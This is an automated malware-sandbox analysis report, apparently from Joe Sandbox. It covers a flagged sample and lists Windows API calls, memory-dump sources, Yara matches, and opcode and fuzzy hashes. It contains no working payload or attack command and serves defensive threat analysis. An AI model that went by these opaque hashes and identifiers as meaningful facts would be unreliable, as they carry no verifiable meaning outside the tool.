                                                              • Opcode Fuzzy Hash: 3034b70ca8a59bcd1a54a412746b10e778b5baf9d18adb7accf15c2e8f28c0ec
                                                              • Instruction Fuzzy Hash: 1421B671714216BBDF289B15EC81EBB33A8EF94314B5001BFF902D6251EB399E818A58
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • EnumSystemLocalesW.KERNEL32(004212A6,00000001,00000000,?,-00000050,?,02191B3B,00000000,?,?,?,00000055,?), ref: 02191459
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                              • Instruction ID: c3d5976aa5228d0becfeb539948c5c904878a23d4e27312ccdc9b099aaf5c3d5
                                                              • Opcode Fuzzy Hash: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                              • Instruction Fuzzy Hash: B011C236244702AFDF189F3998917BAB792FB85758B14842DEA8A87A40D771B583CB40
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • EnumSystemLocalesW.KERNEL32(004212A6,00000001,00000000,?,-00000050,?,004218D4,00000000,?,?,?,00000055,?), ref: 004211F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                              • Instruction ID: 1a156f0733b9bda999ead150ec1823f2d34610307ed71135a7bf92de471f7001
                                                              • Opcode Fuzzy Hash: 8e528c0da2a2a4483534ddf9075a4fd2e7139669a6f630b31fcbe4f79ce78334
                                                              • Instruction Fuzzy Hash: 951129363003019FDB189F79D8916BABB91FF94318B58442EE64687750E7756943C744
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,02191729,00000000,00000000,?), ref: 021919B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                              • Instruction ID: 67dbdb7cb31aa97e3bf9866bdffa814e190012ea116f433077c377375391ddee
                                                              • Opcode Fuzzy Hash: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                              • Instruction Fuzzy Hash: 5DF0A9366801177FDF285F65CC45BBB7759EB40758F154429DC4AA3180EB74FE82CA90
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004214C2,00000000,00000000,?), ref: 00421751
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                              • Instruction ID: 555e0e489eff99157af98c992298e2a68b21b4fc6b2928ebd806db451c2e11da
                                                              • Opcode Fuzzy Hash: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                              • Instruction Fuzzy Hash: 38F04932700121BBDB245B20DC05BBB37A8EBC0314F45042AEC02A3290DA38FD42D694
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • EnumSystemLocalesW.KERNEL32(004214F9,00000001,00000001,?,-00000050,?,02191AFF,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 021914CC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                              • Instruction ID: 4a14fe7169eeef3f1d2f2b00d9353a7fcff72a9ab1be7b46e3d9b1a7651ab299
                                                              • Opcode Fuzzy Hash: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                              • Instruction Fuzzy Hash: 5CF046363803056FDF246F39DC80B7A7BD5EF85728F04802DFA094B680C7B1A842CA00
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • EnumSystemLocalesW.KERNEL32(004214F9,00000001,00000001,?,-00000050,?,00421898,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00421265
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                              • Instruction ID: 14f67bad7a4cfcfa4ee4bc3d5db6401a72568cf36d7e4a3035cac00d244dbeff
                                                              • Opcode Fuzzy Hash: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                              • Instruction Fuzzy Hash: 92F04C323003049FDB245F35EC81B7B7B95FF80368B44446EF605876A0C6B55C42C614
                                                              APIs
                                                                • Part of subcall function 02185210: RtlEnterCriticalSection.NTDLL(?), ref: 0218521F
                                                              • EnumSystemLocalesW.KERNEL32(00419722,00000001,004356C0,0000000C,02189D57,?), ref: 021899CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              • API String ID: 1272433827-0
                                                              • Opcode ID: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                              • Instruction ID: 55229895f7635a1e7a0f88a692f9cff92d3b17b25382989084a035a52837f175
                                                              • Opcode Fuzzy Hash: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                              • Instruction Fuzzy Hash: 47F04976A94305DFD714EF98E882BAD77F1EB08721F20412AE5149B3E0DB7959408F58
                                                              APIs
                                                                • Part of subcall function 00414FA9: EnterCriticalSection.KERNEL32(?,?,004165C0,00000000,00435520,0000000C,00416587,?,?,004196BE,?,?,00418FC5,00000001,00000364,00000008), ref: 00414FB8
                                                              • EnumSystemLocalesW.KERNEL32(00419722,00000001,004356C0,0000000C,00419AF0,00000000), ref: 00419767
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              • API String ID: 1272433827-0
                                                              • Opcode ID: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                              • Instruction ID: cedf4b0542652410236bfbe7b93f0e3d125763c36bf37d7ca1942f65020527f8
                                                              • Opcode Fuzzy Hash: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                              • Instruction Fuzzy Hash: AEF03276A14204DFE714EF98E852B9CB7B0EB48725F20402FF5189B2E0CB7999808F58
                                                              APIs
                                                                • Part of subcall function 0218908A: GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                                • Part of subcall function 0218908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              • EnumSystemLocalesW.KERNEL32(0042108E,00000001,00000001,?,?,02191B5D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 021913D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                              • Instruction ID: 412a2d1f89329653af3ce318ae2d52d045508de82aedab0580497ec6043c9bd1
                                                              • Opcode Fuzzy Hash: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                              • Instruction Fuzzy Hash: C8F0553634020567CF14AF35D88577A7FA4EFC1720B064058EA098BA90C7B2A983CB90
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                                • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              • EnumSystemLocalesW.KERNEL32(0042108E,00000001,00000001,?,?,004218F6,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0042116C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                              • Instruction ID: e5017fa5d0c691943728d275092cb8a263cd523bacd6dc2a7f3d241a18a3b7dc
                                                              • Opcode Fuzzy Hash: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                              • Instruction Fuzzy Hash: 6CF0553A30020557CB149F39E84577A7FA0EFC5714B46405EEB098B2A0C6799883C798
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,021887E5,?,20001004,00000000,00000002,?,?,02187DF2), ref: 02189E8F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 8ec4a8ccac36f94d5fb742d1bdb748f86e068ed4b8c627be13f1f3e7e8dff0aa
                                                              • Instruction ID: 5562e227153bc92ca84eb892ead9a1a0687a3c4fbee632d312b3f6ea0be52ed0
                                                              • Opcode Fuzzy Hash: 8ec4a8ccac36f94d5fb742d1bdb748f86e068ed4b8c627be13f1f3e7e8dff0aa
                                                              • Instruction Fuzzy Hash: 2EE04F3264121CBBDF123F60DC48ABE3E1AEF44760F144024FC0965360DF3289229ED4
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041857E,?,20001004,00000000,00000002,?,?,00417B8B), ref: 00419C28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: fbb0bd12f0dadb61687aff6c97eb42df5c7e0ff724206f946788ad3c9e0e9366
                                                              • Instruction ID: 917ba661290b8a4deb7db836a8ac3b69315417969e7b9d4f32c12ff31b6cd56c
                                                              • Opcode Fuzzy Hash: fbb0bd12f0dadb61687aff6c97eb42df5c7e0ff724206f946788ad3c9e0e9366
                                                              • Instruction Fuzzy Hash: 8FE0DF3110411CBBCF123F21EC04EEE3F5AEF44720F004026FC0022261CB358DA2AAD9
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(0040D955,0217D752), ref: 0217DBB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                              • Instruction ID: cde6de7be7cd455b3e18df9ee2833f47d38776692af0ef052807f8dbc91abbb5
                                                              • Opcode Fuzzy Hash: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000D955,0040D4EB), ref: 0040D94E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                              • Instruction ID: cde6de7be7cd455b3e18df9ee2833f47d38776692af0ef052807f8dbc91abbb5
                                                              • Opcode Fuzzy Hash: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                              • Instruction Fuzzy Hash:
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                              • Instruction ID: 66a85d118b54bee3bc3cc58e85d7d4f85ee5d3ccdd0858b1daf6c4d57af983c4
                                                              • Opcode Fuzzy Hash: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                              • Instruction Fuzzy Hash: 95515930AC46C89AFB3FBE6889D47BE679A9F01308F08041ADC82E7A91D771D945CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                              • Instruction ID: d382f1aad1799511db79056f439b06b71b5eef6ff719d2bd3963ecced05497c3
                                                              • Opcode Fuzzy Hash: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                              • Instruction Fuzzy Hash: 4D511570AC07C86ADF3BBA6988D47BE77DAAB52308F04042ECC82D7281D7359945CE52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                              • Instruction ID: 760798cd14c0c86bed722a4dd279e5522f8c51e663d9525b9623c5e101cee0d5
                                                              • Opcode Fuzzy Hash: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                              • Instruction Fuzzy Hash: 9F51357020064876DB388A289BE67FF679B9B16308F54041FD486D73C1D6DD9DE6820E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                              • Instruction ID: 853e48f0d740310cc3a7760be4e74d6cb6a6f8b251400cc0940caf2d61d52f37
                                                              • Opcode Fuzzy Hash: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                              • Instruction Fuzzy Hash: 5F51777060064996EB3CAA2D8B957FFA799AB01304F14011FD892D73D1D6DC9EF6831E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: uTB
                                                              • API String ID: 0-3950955333
                                                              • Opcode ID: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                              • Instruction ID: feb5b225c8a083bfb470cfa5e0dae61ad3f57a9261c2ea5476071e4c46a7d3ba
                                                              • Opcode Fuzzy Hash: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                              • Instruction Fuzzy Hash: 3C21B673F20539477B0CC47E8C5227DB6E1D78C501745423EF8A6EA2C1D968D917E2E4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7394599106bb57588a7fcc5f2a316000e217cfd668e3a351bfa2c2c00aeffec0
                                                              • Instruction ID: d0e7df19af42a2597c1c9a0a4d59ec128da6f77e801e7a5f5831370ed6b1a342
                                                              • Opcode Fuzzy Hash: 7394599106bb57588a7fcc5f2a316000e217cfd668e3a351bfa2c2c00aeffec0
                                                              • Instruction Fuzzy Hash: 50321672E65F014DD7239634C86233A6249AFB73C4F55D737F81AB5AA5EB29C4C34104
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                              • Instruction ID: 2b3a4cad4db4d83fd762e312e2b7a61b942242056453729931060dcfca4c33a9
                                                              • Opcode Fuzzy Hash: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                              • Instruction Fuzzy Hash: 3021B673F205395B7B0CC47E8C5227DB6E1C68C501745423AF8A6EA2C1D968D917E2E4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                              • Instruction ID: 874a584c079d6cbeb6f5eabab9eaedd3a1f5ccbc055af7ab4e481e00275099ca
                                                              • Opcode Fuzzy Hash: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                              • Instruction Fuzzy Hash: 49117333F30C255A6B5C816D8C172BAA5D6EBD825074F533AD826E7284E9A4DE13D290
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                              • Instruction ID: 54cccbac12d7b0a806302a64698748c03833c4b2bf86144adce5760e1b7c8ced
                                                              • Opcode Fuzzy Hash: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                              • Instruction Fuzzy Hash: 9511A333F30C255A675C81698C172BAA1D2EBD824034F533AD826EB284E9A4DE23D290
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 6ec3b3a6773a7d6e7410f7d2b63b3ad8c9150c732b1bde7dbca6510266de66e2
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 501127BF2C014A47E61B8A2DD5B42B6A7F9EBC512873D42FAD0828F758D322E144D600
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 1c530e7fa6924d9775cb3f61f4bfdae9f72d3837fde0802971f232fe1001d1b0
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 22112BF730105183D6A4863FC8B46B7A795FBCA32072C4B7BE1816B7D4D13AE965DA08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
